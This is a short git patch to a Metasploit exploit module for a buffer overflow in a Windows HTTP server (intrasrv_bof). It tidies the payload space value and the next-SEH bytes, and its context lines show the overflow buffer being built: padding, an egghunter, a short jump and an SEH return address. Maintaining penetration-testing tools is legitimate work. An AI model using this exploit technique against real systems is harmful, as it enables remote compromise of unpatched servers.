From 49bcec5c926e08d89e2e61d112d073d8dce21365 Mon Sep 17 00:00:00 2001
From: Nathan Einwechter <neinwechter@gmail.com>
Date: Mon, 12 Aug 2013 18:20:03 -0400
Subject: [PATCH] Additional cleanup

---
 modules/exploits/windows/http/intrasrv_bof.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb
index ca082b2606..f7896a74f5 100644
--- a/modules/exploits/windows/http/intrasrv_bof.rb
+++ b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Payload'        =>
 				{
-					'Space' => '4660',
+					'Space' => 4660,
 					'StackAdjustment' => -3500,
 					'BadChars' => "\x00"
 				},
@@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		buf = rand_text(target['Offset']-126)			# junk to egghunter at jmp -128
 		buf << hunter						# egghunter
 		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
-		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
+		buf << "\xeb\x80" + rand_text(2)			# nseh - jmp -128 to egghunter
 		buf << [target.ret].pack("V*") 				# seh
 
 		# second last byte of payload/egg gets corrupted - pad 2 bytes